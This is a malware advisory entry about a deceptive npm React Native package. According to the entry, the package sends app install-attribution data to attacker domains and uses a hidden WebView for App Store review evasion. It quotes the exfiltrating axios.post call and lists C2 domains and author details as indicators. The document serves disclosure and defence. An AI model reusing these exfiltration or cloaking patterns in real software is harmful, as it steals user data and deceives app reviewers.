MAL-2026-6171

The npm package personal-custom-button (published by npm user sproger, slavatopbuyer@gmail.com) is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains (surrprisingcoompanny.lol and barbellmate.xyz). On component mount it registers appsFlyer.onInstallConversionData and exfiltrates the app's install/conversion attribution data via axios.post("https://surrprisingcoompanny.lol", data), fetches a remote-config URL, and renders it full-screen in a react-native-webview that is hidden (display:'none') unless the server returns a valid URL — i.e. App Store review-evasion / attribution-laundering ('cloaking'). The package name is a decoy unrelated to its actual function, and the real logic is concealed behind junk 'calculator' functions with Ukrainian-language comments. Indicators of compromise: C2 surrprisingcoompanny.lol, barbellmate.xyz; npm author sproger. Both C2 domains are currently unregistered (dangling-C2 takeover risk for any app still shipping these packages). Reproducible from the published tarball, e.g. socket-network@1.0.0 SocketComponent*.jsx: appsFlyer.onInstallConversionData(...) -> axios.post("https://surrprisingcoompanny.lol", data); axios.get(fLink) remote config; hidden <WebView source={{uri: techResult}}> gated on display:'none'/'flex'.